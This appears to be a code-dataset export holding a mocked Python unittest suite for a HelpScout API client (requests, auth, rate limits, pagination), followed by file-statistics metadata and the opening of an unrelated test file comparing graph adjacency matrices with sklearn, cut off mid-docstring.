HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
hs.get_objects(endpoint, params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_get_objects_resource_id(self):
user = {'id': '10', 'name': 'Mike'}
endpoint, resource_id = 'users', 10
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
cls.from_results.return_value = [user]
hit.return_value = hit_return = user
data = hs.get_objects(endpoint, resource_id=resource_id)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', 10, params=None)
cls.from_results.assert_called_with(hit_return)
self.assertEqual(data, user)
def test_hit_no_access_token_ok(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client()
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger'), \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
list(hs.hit_(endpoint, method))
# Asserts
auth.assert_called_once()
auth_headers.assert_called_once()
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
def test_hit_ok(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
def test_hit_resource_id_ok(self):
endpoint, method, resource_id = 'users', 'get', 4
full_url = self.url + endpoint + '/' + str(resource_id)
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
ret = list(hs.hit_(endpoint, method, resource_id))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_not_called()
self.assertEqual(ret, [json_response])
def test_hit_params_dict_ok(self):
params, params_str = {'embed': 'threads'}, '?embed=threads'
endpoint, method = 'users', 'get'
full_url = self.url + endpoint + params_str
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
list(hs.hit_(endpoint, method, None, params=params))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
def test_hit_resource_id_with_params_dict_ok(self):
params, params_str = {'embed': 'threads'}, '?embed=threads'
endpoint, method, resource_id = 'users', 'get', 4
full_url = self.url + endpoint + '/' + str(resource_id) + params_str
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
ret = list(hs.hit_(endpoint, method, resource_id, params=params))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_not_called()
self.assertEqual(ret, [json_response])
def test_hit_resource_id_with_params_str_ok(self):
params_str = 'embed=threads'
endpoint, method, resource_id = 'users', 'get', 4
full_url = (self.url + endpoint + '/' + str(resource_id) + '?' +
params_str)
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.ok = True
response.json.return_value = json_response = {'a': 'b'}
response.status_code = 200
ret = list(
hs.hit_(endpoint, method, resource_id, params=params_str))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_called_once()
pages.assert_not_called()
self.assertEqual(ret, [json_response])
def test_hit_post_ok(self):
endpoint, method = 'users', 'post'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.post.return_value = MagicMock()
response.status_code = 201
response.ok = True
response.json.return_value = {'a': 'b'}
ret = list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 201)'),
]
)
requests.post.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
self.assertEqual(ret, [None])
def test_hit_delete_ok(self):
endpoint, method = 'users', 'delete'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.delete.return_value = MagicMock()
response.status_code = 204
response.ok = True
response.json.return_value = {'a': 'b'}
ret = list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 204)'),
]
)
requests.delete.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
self.assertEqual(ret, [None])
def test_hit_patch_ok(self):
endpoint, method = 'users', 'patch'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.patch.return_value = MagicMock()
response.status_code = 204
response.ok = True
response.json.return_value = {'a': 'b'}
ret = list(hs.hit_(endpoint, method))
# Asserts
auth.assert_not_called()
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 204)'),
]
)
requests.patch.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
self.assertEqual(ret, [None])
def test_hit_token_expired(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
type(response).ok = PropertyMock(side_effect=[False, True])
type(response).status_code = PropertyMock(side_effect=[401, 200])
response.json.return_value = json_response = {'a': 'b'}
list(hs.hit_(endpoint, method))
# Asserts
self.assertEqual(auth_headers.call_count, 2)
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (False - 401)'),
call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
self.assertEqual(
requests.get.call_args_list,
[call(full_url, headers=headers, json=None) for _ in range(2)])
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
auth.assert_called_once()
def test_hit_rate_limit_exceeded(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
type(response).ok = PropertyMock(side_effect=[False, True])
type(response).status_code = PropertyMock(side_effect=[429, 200])
response.json.return_value = json_response = {'a': 'b'}
list(hs.hit_(endpoint, method))
# Asserts
self.assertEqual(auth_headers.call_count, 2)
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (False - 429)'),
call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (True - 200)'),
]
)
self.assertEqual(
requests.get.call_args_list,
[call(full_url, headers=headers, json=None) for _ in range(2)])
response.json.assert_called_once()
pages.assert_called_once_with(json_response, method)
rate_limit.assert_called_once()
auth.assert_not_called()
def test_hit_exception(self):
endpoint, method = 'users', 'get'
full_url = self.url + endpoint
hs_path = 'helpscout.client.HelpScout.'
hs = self._get_client(token='abc')
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit, \
patch(hs_path + '_results_with_pagination') as pages:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
response = requests.get.return_value = MagicMock()
response.text = 'Error message from help scout'
type(response).ok = PropertyMock(side_effect=[False, True])
type(response).status_code = PropertyMock(side_effect=[500, 200])
response.json.return_value = {'a': 'b'}
# Call
with self.assertRaises(HelpScoutException):
list(hs.hit_(endpoint, method))
# Asserts
auth_headers.assert_called_once()
log_msg_body = method + ' ' + full_url
self.assertEqual(
logger.debug.call_args_list,
[call('Request: ' + log_msg_body),
call('Received: ' + log_msg_body + ' (False - 500)'),
]
)
requests.get.assert_called_once_with(
full_url, headers=headers, json=None)
response.json.assert_not_called()
pages.assert_not_called()
rate_limit.assert_not_called()
auth.assert_not_called()
def test_pagination_no_embedded(self):
response = {'msg': 'welcome to help scout'}
hs = self._get_client(token='abc')
ret = list(hs._results_with_pagination(response, 'get'))
self.assertEqual(ret, [response])
def test_pagination_embedded_single(self):
response = {EmbeddedKey: {'msg': 'hello', '_links': {'next': None}}}
hs = self._get_client(token='abc')
ret = list(hs._results_with_pagination(response, 'get'))
self.assertEqual(ret, [response[EmbeddedKey]])
def test_pagination_embedded_list(self):
response = {
EmbeddedKey: [
{'msg': 'hello'},
{'msg': 'bye'},
],
'_links': {'next': None}
}
hs = self._get_client(token='abc')
ret = list(hs._results_with_pagination(response, 'get'))
self.assertEqual(ret, response[EmbeddedKey])
def test_pagination_embedded_next_page_ok(self):
method = 'get'
response_value = {
EmbeddedKey: [
{'msg': 'hello'},
{'msg': 'bye'},
],
'_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
}
responses_values = [
{EmbeddedKey: [
{'msg': 'blink 1'},
{'msg': 'blink 2'},
],
'_links': {'next':
{'href': 'http://helpscout.com/next_page/111'}}},
{EmbeddedKey: [
{'msg': 'see ya'},
],
'_links': {'next': None}},
]
expected = (response_value[EmbeddedKey] +
responses_values[0][EmbeddedKey] +
responses_values[1][EmbeddedKey])
hs = self._get_client(token='abc')
hs_path = 'helpscout.client.HelpScout.'
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
responses = [
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[1])),
]
requests.get.side_effect = responses
# Call
ret = list(hs._results_with_pagination(response_value, method))
# Asserts
self.assertEqual(ret, expected)
self.assertEqual(auth_headers.call_count, 2)
self.assertEqual(
logger.debug.call_args_list,
[call(method + ' ' + response_value['_links']['next']['href']),
call(method + ' ' + responses_values[0]['_links']['next'][
'href'])])
self.assertEqual(
requests.get.call_args_list,
[call(response_value['_links']['next']['href'],
headers=headers),
call(responses_values[0]['_links']['next']['href'],
headers=headers)
])
responses[0].json.assert_called_once()
responses[1].json.assert_called_once()
auth.assert_not_called()
rate_limit.assert_not_called()
def test_pagination_embedded_next_page_token_expired(self):
method = 'get'
response_value = {
EmbeddedKey: [
{'msg': 'hello'},
{'msg': 'bye'},
],
'_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
}
responses_values = [
{EmbeddedKey: [
{'msg': 'blink 1'},
{'msg': 'blink 2'},
],
'_links': {'next':
{'href': 'http://helpscout.com/next_page/111'}}},
{EmbeddedKey: [
{'msg': 'see ya'},
],
'_links': {'next': None}},
]
expected = (response_value[EmbeddedKey] +
responses_values[0][EmbeddedKey] +
responses_values[1][EmbeddedKey])
hs = self._get_client(token='abc')
hs_path = 'helpscout.client.HelpScout.'
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
responses = [
MagicMock(ok=False, status_code=401,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[1])),
]
requests.get.side_effect = responses
# Call
ret = list(hs._results_with_pagination(response_value, method))
# Asserts
self.assertEqual(ret, expected)
self.assertEqual(auth_headers.call_count, 3)
self.assertEqual(
logger.debug.call_args_list,
[call(method + ' ' + response_value['_links']['next']['href']),
call(method + ' ' + response_value['_links']['next']['href']),
call(method + ' ' + responses_values[0]['_links']['next'][
'href'])])
self.assertEqual(
requests.get.call_args_list,
[call(response_value['_links']['next']['href'],
headers=headers),
call(response_value['_links']['next']['href'],
headers=headers),
call(responses_values[0]['_links']['next']['href'],
headers=headers)
])
responses[1].json.assert_called_once()
responses[2].json.assert_called_once()
auth.assert_called_once()
rate_limit.assert_not_called()
def test_pagination_embedded_next_page_rate_limit_exceeded(self):
method = 'get'
response_value = {
EmbeddedKey: [
{'msg': 'hello'},
{'msg': 'bye'},
],
'_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
}
responses_values = [
{EmbeddedKey: [
{'msg': 'blink 1'},
{'msg': 'blink 2'},
],
'_links': {'next':
{'href': 'http://helpscout.com/next_page/111'}}},
{EmbeddedKey: [
{'msg': 'see ya'},
],
'_links': {'next': None}},
]
expected = (response_value[EmbeddedKey] +
responses_values[0][EmbeddedKey] +
responses_values[1][EmbeddedKey])
hs = self._get_client(token='abc')
hs_path = 'helpscout.client.HelpScout.'
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger, \
patch(hs_path + '_authenticate') as auth, \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded') as rate_limit:
# Setup
auth_headers.return_value = headers = {'token': 'abc'}
responses = [
MagicMock(ok=False, status_code=429,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[1])),
]
requests.get.side_effect = responses
# Call
ret = list(hs._results_with_pagination(response_value, method))
# Asserts
self.assertEqual(ret, expected)
self.assertEqual(auth_headers.call_count, 3)
self.assertEqual(
logger.debug.call_args_list,
[call(method + ' ' + response_value['_links']['next']['href']),
call(method + ' ' + response_value['_links']['next']['href']),
call(method + ' ' + responses_values[0]['_links']['next'][
'href'])])
self.assertEqual(
requests.get.call_args_list,
[call(response_value['_links']['next']['href'],
headers=headers),
call(response_value['_links']['next']['href'],
headers=headers),
call(responses_values[0]['_links']['next']['href'],
headers=headers)
])
responses[0].json.assert_not_called()
responses[1].json.assert_called_once()
responses[2].json.assert_called_once()
auth.assert_not_called()
rate_limit.assert_called_once()
def test_pagination_exception(self):
method = 'get'
response_value = {
EmbeddedKey: [
{'msg': 'hello'},
{'msg': 'bye'},
],
'_links': {'next': {'href': 'http://helpscout.com/next_page/110'}}
}
responses_values = [
{EmbeddedKey: [
{'msg': 'blink 1'},
{'msg': 'blink 2'},
],
'_links': {'next':
{'href': 'http://helpscout.com/next_page/111'}}},
{EmbeddedKey: [
{'msg': 'see ya'},
],
'_links': {'next': None}},
]
hs = self._get_client(token='abc')
hs_path = 'helpscout.client.HelpScout.'
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger'), \
patch(hs_path + '_authenticate'), \
patch(hs_path + '_authentication_headers') as auth_headers, \
patch(hs_path + '_handle_rate_limit_exceeded'):
# Setup
auth_headers.return_value = {'token': 'abc'}
responses = [
MagicMock(ok=False, status_code=500,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[0])),
MagicMock(ok=True, status_code=200,
json=MagicMock(return_value=responses_values[1])),
]
requests.get.side_effect = responses
# Call
with self.assertRaises(HelpScoutException):
list(hs._results_with_pagination(response_value, method))
def test_authenticate_ok(self):
hs = self._get_client()
full_url = self.url + 'oauth2/token'
data = {
'grant_type': 'client_credentials',
'client_id': self.app_id,
'client_secret': self.app_secret,
}
response_value = {'access_token': 'kakaroto'}
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger:
# Setup
response = MagicMock()
response.ok, response.json.return_value = True, response_value
requests.post.return_value = response
hs._authenticate()
# Asserts
logger.debug.assert_called_with('post ' + full_url)
requests.post.assert_called_with(full_url, data=data)
response.json.assert_called_once()
self.assertEqual(hs.access_token, response_value['access_token'])
def test_authenticate_bad(self):
hs = self._get_client()
full_url = self.url + 'oauth2/token'
data = {
'grant_type': 'client_credentials',
'client_id': self.app_id,
'client_secret': self.app_secret,
}
response_value = {'access_token': 'kakaroto'}
with patch('helpscout.client.requests') as requests, \
patch('helpscout.client.logger') as logger:
# Setup
response = MagicMock()
response.ok, response.json.return_value = False, response_value
requests.post.return_value = response
# Call
with self.assertRaises(HelpScoutAuthenticationException):
hs._authenticate()
# Asserts
logger.debug.assert_called_with('post ' + full_url)
requests.post.assert_called_with(full_url, data=data)
response.json.assert_not_called()
self.assertEqual(hs.access_token, None)
def test_authentication_headers(self):
token = 'kakaroto'
expected = {
'Authorization': 'Bearer kakaroto',
'content-type': 'application/json',
'charset': 'UTF-8'
}
hs = self._get_client(token=token)
self.assertEqual(hs._authentication_headers(), expected)
def test_handle_rate_limit_exceeded_sleep(self):
hs = self._get_client()
with patch('helpscout.client.time') as time, \
patch('helpscout.client.logger') as logger:
hs._handle_rate_limit_exceeded()
logger.warning.assert_called_with('Rate limit exceeded.')
time.sleep.assert_called_with(self.seconds)
def test_handle_rate_limit_exceeded_exception(self):
hs = self._get_client(sleep=False)
with patch('helpscout.client.time') as time, \
patch('helpscout.client.logger') as logger:
with self.assertRaises(HelpScoutRateLimitExceededException):
hs._handle_rate_limit_exceeded()
logger.warning.assert_called_with('Rate limit exceeded.')
time.sleep.assert_not_called()
def test_getattr_requester_get(self):
endpoint, params = 'users', {'id': '10', 'name': 'Mike'}
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = hit_return = 9
getattr(hs, endpoint).get(params=params)
HelpScoutObject.cls.assert_called_with(endpoint, endpoint)
hit.assert_called_with(endpoint, 'get', None, params=params)
cls.from_results.assert_called_with(hit_return)
def test_getattr_requester_delete_resource_id(self):
endpoint, resource_id = 'users', 10
hs = self._get_client()
with patch('helpscout.client.HelpScoutObject') as HelpScoutObject, \
patch('helpscout.client.HelpScout.hit_') as hit:
HelpScoutObject.cls.return_value = cls = MagicMock()
hit.return_value = (x for x in range(1))
getattr(hs, endpoint).delete(resource_id=resource_id)
hit.assert_called_with(endpoint, 'delete', resource_id=resource_id)
HelpScoutObject.cls.assert_not_called()
cls.from_results.assert_not_called()
def test_getattr_requester_http_get_values(self):
hs = self._get_client()
conversations = hs.conversations
get_conversations = conversations.get
self.assertIsInstance(conversations, HelpScoutEndpointRequester)
self.assertEqual(conversations.endpoint, 'conversations')
self.assertIsInstance(get_conversations, partial)
self.assertEqual(get_conversations.func.__self__, hs)
self.assertEqual(get_conversations.func.__name__, 'get_objects')
def test_getattr_requester_http_put_values(self):
hs = self._get_client()
conversations = hs.conversations
put_conversations = conversations.put
self.assertIsInstance(conversations, HelpScoutEndpointRequester)
self.assertEqual(conversations.endpoint, 'conversations')
self.assertIsInstance(put_conversations, partial)
self.assertEqual(put_conversations.func.__self__, conversations)
self.assertEqual(put_conversations.func.__name__, '_yielded_function')
def test_getattr_requester_resource(self):
hs = self._get_client()
conversations = hs.conversations
conversation_requester = conversations[910]
self.assertIsInstance(
conversation_requester, HelpScoutEndpointRequester)
self.assertEqual(conversation_requester.client, hs)
self.assertEqual(conversation_requester.endpoint, 'conversations/910')
def test_getattr_requester_resource_attribute(self):
hs = self._get_client()
conversations = hs.conversations
conversation_requester = conversations[910]
tags_requester = conversation_requester.tags
self.assertIsInstance(tags_requester, HelpScoutEndpointRequester)
self.assertEqual(tags_requester.client, hs)
self.assertEqual(tags_requester.endpoint, 'conversations/910/tags')
if __name__ == '__main__':
main()
| 45.779279
| 79
| 0.568877
| 4,136
| 40,652
| 5.301741
| 0.043762
| 0.0472
| 0.047428
| 0.023942
| 0.900036
| 0.86743
| 0.85685
| 0.837833
| 0.826204
| 0.817174
| 0
| 0.007972
| 0.318066
| 40,652
| 887
| 80
| 45.830891
| 0.783024
| 0.006716
| 0
| 0.763682
| 0
| 0
| 0.126063
| 0.064507
| 0
| 0
| 0
| 0
| 0.205224
| 1
| 0.044776
| false
| 0
| 0.006219
| 0
| 0.059701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f2032119c30b4674a4cc4ed890a1ff746d8c01cc
| 7,063
|
py
|
Python
|
tests/test_graph.py
|
jejjohnson/kernellib
|
eb9f80c1b605c8a6b5e8a324efd4ef07d8f59050
|
[
"MIT"
] | 1
|
2021-02-04T08:52:04.000Z
|
2021-02-04T08:52:04.000Z
|
tests/test_graph.py
|
jejjohnson/kernellib
|
eb9f80c1b605c8a6b5e8a324efd4ef07d8f59050
|
[
"MIT"
] | null | null | null |
tests/test_graph.py
|
jejjohnson/kernellib
|
eb9f80c1b605c8a6b5e8a324efd4ef07d8f59050
|
[
"MIT"
] | 1
|
2018-04-17T06:42:09.000Z
|
2018-04-17T06:42:09.000Z
|
"""
General and conceptual tests for graph routines
Date Created : Tuesday, 7th February, 2017
Author : J. Emmanuel Johnson
Email : emanjohnson91@gmail.com
Most of the tests here are based off of the sklearn library.
I decided not to reinvent the wheel and just wanted to use what
they already have. I mainly wanted to ensure that my 'wrapper'
routine outputs the same results as the sklearn library.
"""
from nose.tools import assert_equal
import numpy as np
from sklearn.neighbors import NearestNeighbors
from manilearn.utils.graph import adjacency
# adjacency matrix - k-nearest neighbors test
def test_adjacency_k_brute_connect():
"""
Adjacency Matrix k-Nearest Neighbors test
"""
# import data
data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
# set default parameters
n_neighbors = 5
algorithm = 'brute'
method = 'knn'
# sklearn adjacency matrix
nbrs = NearestNeighbors(n_neighbors=n_neighbors,
algorithm=algorithm).fit(data)
sklearn_mat = nbrs.kneighbors_graph(data)
sklearn_mat = sklearn_mat.toarray()
# my routine
my_mat = adjacency(data,
n_neighbors=n_neighbors,
algorithm=algorithm,
method=method)
my_mat = my_mat.toarray()
# assert adjacency matrices are equal
msg = 'Distance values comparison.'
assert_equal(sklearn_mat.all(), my_mat.all(), msg=msg)
def test_adjacency_k_brute_heat():
"""
Adjacency Matrix k-Nearest Neighbors test
"""
# import data
data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
# set default parameters
n_neighbors = 5
algorithm = 'brute'
method = 'knn'
weight = 'heat'
adjacency_kwargs = {'gamma': 1.0}
gamma = 1.0
# sklearn adjacency matrix
nbrs = NearestNeighbors(n_neighbors=n_neighbors,
algorithm=algorithm).fit(data)
sklearn_mat = nbrs.kneighbors_graph(data)
sklearn_mat.data = np.exp(-sklearn_mat.data**2 / gamma**2)
sklearn_mat = sklearn_mat.toarray()
# my routine
my_mat = adjacency(data,
n_neighbors=n_neighbors,
algorithm=algorithm,
method=method,
weight=weight,
adjacency_kwargs=adjacency_kwargs)
my_mat = my_mat.toarray()
# assert adjacency matrices are equal
msg = 'Distance values comparison.'
assert_equal(sklearn_mat.all(), my_mat.all(), msg=msg)
def test_adjacency_k_brute_angle():
"""
Adjacency Matrix k-Nearest Neighbors test
"""
# import data
data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
# set default parameters
n_neighbors = 5
algorithm = 'brute'
method = 'knn'
weight = 'angle'
# sklearn adjacency matrix
nbrs = NearestNeighbors(n_neighbors=n_neighbors,
algorithm=algorithm).fit(data)
sklearn_mat = nbrs.kneighbors_graph(data)
sklearn_mat.data = np.exp(-np.arccos(1-sklearn_mat.data))
sklearn_mat = sklearn_mat.toarray()
# my routine
my_mat = adjacency(data,
n_neighbors=n_neighbors,
algorithm=algorithm,
method=method,
weight=weight)
my_mat = my_mat.toarray()
# assert adjacency matrices are equal
msg = 'Distance values comparison.'
assert_equal(sklearn_mat.all(), my_mat.all(), msg=msg)
# adjacency matrix - radius-nearest neighbors test
def test_adjacency_r_brute_connect():
"""
Adjacency Matrix radius-Nearest Neighbors test
"""
# import data
data = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
# set default parameters
radius = 1.5
algorithm = 'brute'
method = 'radius'
# sklearn adjacency matrix
nbrs = NearestNeighbors(radius=radius,
algorithm=algorithm).fit(data)
sklearn_mat = nbrs.radius_neighbors_graph(data)
sklearn_mat = sklearn_mat.toarray()
# my routine
my_mat = adjacency(data,
radius=radius,
algorithm=algorithm,
method=method)
my_mat = my_mat.toarray()
# assert adjacency matrices are equal
msg = 'Distance values comparison.'
assert_equal(sklearn_mat.all(), my_mat.all(), msg=msg)
def test_adjacency_r_brute_heat():
"""
